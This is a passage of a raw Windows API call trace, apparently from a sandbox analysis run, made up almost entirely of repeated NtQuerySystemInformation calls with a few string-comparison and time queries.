Length=0x0, ResultLength=0x0) [0226.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0227.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0227.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0227.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0227.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd210, Length=0x28, ResultLength=0x0) [0227.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0227.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x28, ResultLength=0x0) [0227.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x28, ResultLength=0x0) [0227.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0227.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x20, ResultLength=0x0) [0227.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0227.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0227.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0227.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0227.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x20, ResultLength=0x0) [0227.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x20, ResultLength=0x0) [0227.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x20, ResultLength=0x0) [0227.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd658, Length=0x50, ResultLength=0x0) [0227.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5d0, Length=0x28, ResultLength=0x0) [0227.083] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd658, Length=0x50, ResultLength=0x0) [0227.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd658, Length=0x50, ResultLength=0x0) [0227.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x50, ResultLength=0x0) [0227.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4c0, Length=0x28, ResultLength=0x0) [0227.084] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x50, ResultLength=0x0) [0227.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x50, ResultLength=0x0) [0227.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x50, ResultLength=0x0) [0227.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd470, Length=0x38, ResultLength=0x0) [0227.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x28, ResultLength=0x0) [0227.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x28, ResultLength=0x0) [0227.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x28, ResultLength=0x0) [0227.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x28, ResultLength=0x0) [0227.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd470, Length=0x38, ResultLength=0x0) [0227.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x28, ResultLength=0x0) [0227.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x28, ResultLength=0x0) [0227.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd470, Length=0x38, ResultLength=0x0) [0227.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x20, ResultLength=0x0) [0227.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x20, ResultLength=0x0) [0227.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x20, ResultLength=0x0) [0227.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x20, ResultLength=0x0) [0227.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd470, Length=0x38, ResultLength=0x0) [0227.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x20, ResultLength=0x0) [0227.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x20, ResultLength=0x0) [0227.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x20, ResultLength=0x0) [0227.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.095] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc7520fd5a0 | out: lpSystemTimeAsFileTime=0xc7520fd5a0*(dwLowDateTime=0xe8a1df83, dwHighDateTime=0x1d5fb6e)) [0227.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd658, Length=0x50, ResultLength=0x0) [0227.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd590, Length=0x28, ResultLength=0x0) [0227.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4a8, Length=0x50, ResultLength=0x0) [0227.095] GetTickCount () returned 0x117957c [0227.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd378, Length=0x58, ResultLength=0x0) [0227.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x38, ResultLength=0x0) [0227.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0227.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0227.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0227.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0227.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x28, ResultLength=0x0) [0227.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x38, ResultLength=0x0) [0227.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x28, ResultLength=0x0) [0227.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x28, ResultLength=0x0) [0227.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x38, ResultLength=0x0) [0227.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x20, ResultLength=0x0) [0227.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0227.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0227.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0227.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x38, ResultLength=0x0) [0227.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x20, ResultLength=0x0) [0227.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0227.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0227.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd378, Length=0x58, ResultLength=0x0) [0227.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0227.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0227.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0227.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0227.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0227.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0227.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0227.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0227.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0227.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0227.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0227.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0227.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0227.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0227.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0227.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0227.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x20, ResultLength=0x0) [0227.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0227.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0227.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0227.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0227.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0227.115] 